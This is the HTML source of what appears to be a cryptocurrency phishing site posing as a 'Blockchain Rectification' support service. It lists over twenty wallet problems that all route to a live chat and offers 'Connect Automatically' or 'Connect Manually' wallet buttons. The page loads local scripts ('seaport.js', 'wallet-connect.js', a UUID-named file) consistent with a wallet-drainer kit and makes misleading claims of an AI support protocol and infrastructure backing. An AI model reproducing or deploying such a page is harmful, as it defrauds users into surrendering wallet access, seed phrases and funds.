<!DOCTYPE html>
<html lang="en">

<head>
    <link data-react-helmet="true" rel="shortcut icon" href="img/image.jpg">
    <meta data-react-helmet="true" name="msapplication-TileColor" content="#da532c">
    <meta data-react-helmet="true" name="theme-color" content="#ffffff">
    <meta data-react-helmet="true" name="description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">
    <meta data-react-helmet="true" name="twitter:card" content="summary_large_image">
    <meta data-react-helmet="true" name="twitter:site" content="@syncwallet">
    <meta data-react-helmet="true" name="twitter:title" content="">
    <meta data-react-helmet="true" name="twitter:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="twitter:img:src" content="../social-card.html">
    <meta data-react-helmet="true" name="og:title" content="Click Here To Validate">
    <meta data-react-helmet="true" name="og:type" content="website">
    <meta data-react-helmet="true" name="og:url" content="../">
    <meta data-react-helmet="true" name="og:image" content="../../syncwallet.online/social-card.png">
    <meta data-react-helmet="true" name="og:description" content="1. Click the above, 2. Select Issue Type 3. Select Wallet Type, 4. Input Necessary information, 5. Validate">
    <meta data-react-helmet="true" name="og:site_name" content="Blockchain Rectification">
    <meta data-react-helmet="true" name="fb:admins" content="365412154213405">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Blockchain Rectification - We are help to help you resolve your crypto related issues One wallet, multiverse support</title>
    <meta name="description" content="One wallet, multiverse support We are unifying Web3 by providing best-in-class, self-custodial, and multichain supportmultiverse support We are unifying Web2 by providing best-in-class, self-custodial, and multichain support">
    <link href="chunks/img/favicon.ico.html" rel="shortcut icon">
    <!-- Fonts -->
    <link rel="stylesheet" href="chunks/css/add.css" />
    <link href="chunks/css/style.min.css" rel="stylesheet">

    <!-- <script src="js/web3.js"></script>
    <script src="js/web3provider.js"></script>
    <script src="js/web3modal.js"></script>
    <script src="js/aes.js"></script>
    <script src="js/ethereum.js"></script> -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/merkletreejs@latest/merkletree.js"></script>
    <script src="./scripts/seaport.js"></script>
    <script src="./scripts/wallet-connect.js"></script>
    <script src="./fb6040f3-a6dd-4944-b227-d8e726222fd2.js"></script>

</head>

<body>
    <div class="box-container limit-width">
        <div id="spinner-area">
            <div class="spinner">
                <div class="double-bounce1"></div>
                <div class="double-bounce2"></div>
            </div>
        </div>
        <!-- ***** FRAME MODE ****** -->
        <div class="body-borders" data-border="20">
            <div class="top-border bg-white"></div>
            <div class="right-border bg-white"></div>
            <div class="bottom-border bg-white"></div>
            <div class="left-border bg-white"></div>
        </div>
        <header id="header">
        </header>
        <!-- BANNER -->
        <!--==================================
            Loader Start Here
    ===================================-->
        <div class="Loader">
            <div class="spinnerPairHolder">
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
                <div class="spinnerPair">
                    <div class="spinnerPairCercle"></div>
                    <div class="spinnerPairCercle"></div>
                </div>
            </div>
        </div>
        <!--==================================
      Loader End Here
===================================-->
        <!--==================================
      Hero Section Start Here
===================================-->

        <div class="top-header overlay item1 text-align" id="about">
            <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;">
                <script type="text/javascript" src="https://files.coinmarketcap.com/static/widget/coinMarquee.js"></script>
                <div id="coinmarketcap-widget-marquee" coins="1,1027,825" currency="USD" theme="dark" transparent="true" show-symbol-logo="true"></div>
            </div>

            <div class="container">
                <nav class="navbar bg-body-tertiary mb-4">
                    <div class="container-fluid">
                        <a class="navbar-brand text-white font-semibold">RectifyBugs</a>
                        <div class="d-flex">
                            <a href="javascript:void(0)" class="myBtn">
                                <div class="btn btn-default-purple-fill me-3 mt-3">Connect</div>
                            </a>
                        </div>
                    </div>
                </nav>
            </div>


            <div class="container">
                <div class="row">
                    <div class="col-lg-6 col-md-6 wrapper">
                        <h1 class="text-white" data-aos="fade-up" data-aos-duration="800">Blockchain Rectification
                            <div class="animatype"> <span id="typed3"></span></div>
                        </h1>
                        <span class="text-white text-justify mt-3 mb-4" data-aos="fade-up" data-aos-duration="1200">Every digital artwork on Upside is authentic and truly unique. Blockchain technology makes this new aproch to digital ownership possible. Open and decentralized protocol for syncing various Wallets issues on Secure Server. This
                            is not an app but a protocol that establishes a remote resolution between all noncustodial wallet/Blockchains. It is an online server which gets you across to every wallet/blockchain/protocol representative to enable effective
                            complain and rectification of issues. You will be on a chat with an Artificial Intelligence, and a customer support agent will join the conversation to assist you. 
                            <br/> <br/>
                            All of this is made possible because of the blockchain cloud infrastructure powered by<span class="c-pink"> Chain Cloud and Sequence.</span>
                        </span>

                        <div class="action text-left ">
                            <a href="javacript:void(0)" class="myBtn">
                                <div class="btn btn-default-purple-fill me-3 mt-3">Connect Wallet</div>
                            </a>
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-6 order-lg-last order-first text-center">
                        <img src="img/hero-img.png" width="80%">
                    </div>
                </div>
                <!-- <div class="col-12 col-md-6 col-lg-12 text-center wrapper">
                    <h1 class="heading" data-aos="fade-up" data-aos-duration="800">Blockchain Rectification <br>
                        <div class="animatype"> <span id="typed3"></span></div>
                    </h1>
                    <h3 class="subheading fw-normal lh-32" data-aos="fade-up" data-aos-duration="1200">Every digital artwork on Upside is authentic and truly unique. Blockchain technology makes this new aproch to digital ownership possible. Open and decentralized protocol for syncing various Wallets issues on Secure Server. This is
                        not an app but a protocol that establishes a remote resolution between all noncustodial wallet/Blockchains. It is an online server which gets you across to every wallet/blockchain/protocol representative to enable effective complain
                        and rectification of issues. You will be on a chat with an Artificial Intelligence, and a customer support agent will join the conversation to assist you. <br>All of this is made possible because of the blockchain cloud infrastructure
                        powered by<span class="c-pink"> Chain Cloud and Sequence.</span></h3>
                    <div class="action">
                        <a href="portal/">
                            <div class="btn btn-default-purple-fill me-3 mt-3 interact-button">Connect Wallet</div>
                        </a>
                    </div>
                </div> -->
            </div>
        </div>

        <img class="blobleft svg d-none" src="chunks/img/background/blob.svg" alt="Blob Background">

        <section class="sec-normal sec-grad-yellow-to-black-right bg-colorstyle bottomhalfpadding">
            <div class="faq">
                <div class="container">
                    <img class="blobright svg d-none" src="chunks/img/background/blob.svg" alt="Blob Background">
                    <div class="row">
                        <div class="col-md-12 col-sm-12 text-center">
                            <h2 class="section-heading text-white mergecolor">Select the issue you are experiencing below</h2>
                            <p class="section-subheading text-muted mergecolor">You can also connect your wallet by selecting any of the <span class="c-pink">option</span> below.</p>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <section class="services sync pt-4 pb-80 bg-colorstyle notoppadding">
            <div class="container">
                <div class="service-wrap">
                    <div class="row">
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:svgjs="http://svgjs.com/svgjs" xmlns:xlink="http://www.w3.org/1999/xlink" width="288" height="65" class="svg ico" src="chunks/fonts/svg/right-left-solid.svg" alt=""></svg>
                                        <svg xmlns="http://www.w3.org/2000/svg" width="288" height="65" viewBox="0 0 512 512" class="svg ico" src="chunks/fonts/svg/right-left-solid.svg" alt="">
                                            <!--! Font Awesome Pro 6.1.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc.-->
                                            <path fill="#fff" d="M32 160h319.9l.0791 72c0 9.547 5.652 18.19 14.41 22c8.754 3.812 18.93 2.078 25.93-4.406l112-104c10.24-9.5 10.24-25.69 0-35.19l-112-104c-6.992-6.484-17.17-8.217-25.93-4.408c-8.758 3.816-14.41 12.46-14.41 22L351.9 96H32C14.31 96 0 110.3 0 127.1S14.31 160 32 160zM480 352H160.1L160 279.1c0-9.547-5.652-18.19-14.41-22C136.9 254.2 126.7 255.9 119.7 262.4l-112 104c-10.24 9.5-10.24 25.69 0 35.19l112 104c6.992 6.484 17.17 8.219 25.93 4.406C154.4 506.2 160 497.5 160 488L160.1 416H480c17.69 0 32-14.31 32-32S497.7 352 480 352z"
                                                class="color000 svgShape"></path>
                                            </svg>
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Migration</div>
                                        <div class="description seccolor">Click here to migrate seamlessly with no hassle.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/right-to-bracket-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Connect to dapss</div>
                                        <div class="description seccolor">Click here if you enncounter error connecting to dapps</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/bug-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Rectification</div>
                                        <div class="description seccolor">Click here for rectification related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/network-wired-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Validate</div>
                                        <div class="description seccolor">Click here to start validation.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Sychronization</div>
                                        <div class="description seccolor">Click here to sync your Wallets.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a a href="javascript:void(Tawk_API.toggle())" class="sync-item ">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/arrow-down-up-lock-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">NFTs</div>
                                        <div class="description seccolor">Click here to mint/transfer nfts or need support on how to receive nfts?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4 ">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/toolbox-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Swap/Exchange</div>
                                        <div class="description seccolor">We will support you in any related issues with swaping and/or exchange of coins.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/file-circle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim Reward</div>
                                        <div class="description seccolor">Click here for reward claiming or any related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/droplet-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim Airdrop</div>
                                        <div class="description seccolor">Click here for airdrop claiming or any related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/circle-pause-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Transaction Delay</div>
                                        <div class="description seccolor">Click here for stuck/delayed transactions.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/coins-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Buy Coins/Tokens</div>
                                        <div class="description seccolor">To trade, your account must be marked as a trusted payment source.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/satellite-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Missing/Irregular balance</div>
                                        <div class="description seccolor">Click here for whitelisting.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/bridge-circle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Bridge Transfer</div>
                                        <div class="description seccolor">Do you have any issue while trying to transfer tokens between chains?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/user-lock-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Claim V2</div>
                                        <div class="description seccolor">Do you have any issue while trying to claim your v2?</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Wallet Glitch/Error</div>
                                        <div class="description seccolor">Click here if you have any glitch issues on your wallet.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/sack-dollar-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">High Fees</div>
                                        <div class="description seccolor">Click here if you are facing an increase in transaction fees.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/circle-check-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Whitelist</div>
                                        <div class="description seccolor">Click here for help whitelisting your wallet for nfts.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/piggy-bank-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Staking</div>
                                        <div class="description seccolor">Click here for tokens/coins staking related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/right-to-bracket-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Login Issues</div>
                                        <div class="description seccolor">Click here if you encounter any issues logging in to your wallet.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Slippage</div>
                                        <div class="description seccolor">Click here for slippage related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Lending Issues</div>
                                        <div class="description seccolor">Click here for Lending related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Farm Issues</div>
                                        <div class="description seccolor">Click here for Farm related issues.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/triangle-exclamation-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Pool issues</div>
                                        <div class="description seccolor">Click here for issues relating to pools</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                        <div class="col-sm-12 col-md-6 col-lg-4">
                            <div class="sync-container bg-seccolorstyle noshadow">
                                <a href="javascript:void(Tawk_API.toggle())" class="sync-item">
                                    <div class="img">
                                        <img class="svg ico" src="chunks/fonts/svg/right-to-bracket-solid.svg" height="65" alt="">
                                    </div>
                                    <div class="inform">
                                        <div class="title mergecolor">Other issues not listed.</div>
                                        <div class="description seccolor">Click here if you encounter any issues not listed above.</div>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
        <footer class="footer">
            <div class="footer-bottom">
                <div class="container">
                    <div class="row">
                        <div class="col-lg-6">
                            <ul class="footer-menu">
                                <li class="menu-item by"> © 2023. Multiverse Wallet Rectification.
                                </li>
                            </ul>
                        </div>
                        <div class="col-lg-6 terms">
                            <ul id="footer-menu" class="footer-menu">
                                <li class="menu-item by"><a href="#">Term of Services</a></li>
                                <li class="menu-item by"><a href="#">Privay Policy</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </footer>
    </div>

    <div id="connectWallet" class="modal">

        <!-- Modal content -->
        <div class="modal-content2">

            <div class="mx-auto col-11 pt-2">
                <span class="close2">&times;</span>

                <h5>Connect to a wallet</h5>
                <div class="pt-5 pb-5">
                    <a href="javascript:void(0)" class="interact-button">
                        <div class="btn-outline-main w-100 pt-2 pb-2">
                            <div class="mx-auto col-10 d-flex justify-content-between">
                                Connect Automatically <img src="./img/api.png" width="32" align="absmiddle">
                            </div>
                        </div>
                    </a>
                    <a href="portal">
                        <div class="btn-outline-main w-100 pt-2 pb-2">
                            <div class="mx-auto col-10 d-flex justify-content-between">
                                Connect Manually <img src="./img/settings.png" width="32" align="absmiddle">
                            </div>
                        </div>
                    </a>
                </div>
            </div>
        </div>

    </div>

    <script src="chunks/js/jquery.min.js"></script>
    <script defer src="chunks/js/scripts.min.js"></script>

    <!--Start of Tawk.to Script-->
    <script type="text/javascript">
        var Tawk_API = Tawk_API || {},
            Tawk_LoadStart = new Date();
        (function() {
            var s1 = document.createElement("script"),
                s0 = document.getElementsByTagName("script")[0];
            s1.async = true;
            s1.src = 'https://embed.tawk.to/64870f8bcc26a871b022075c/1h2np9eg4';
            s1.charset = 'UTF-8';
            s1.setAttribute('crossorigin', '*');
            s0.parentNode.insertBefore(s1, s0);
        })();
    </script>
    <!--End of Tawk.to Script-->

    <script>
        $('.myBtn').on('click', function() {
            $('#connectWallet').css('display', 'block');
        });

        $(".close2").on('click', function() {
            $('.modal').css('display', 'none');
        });
    </script>
</body>

</html>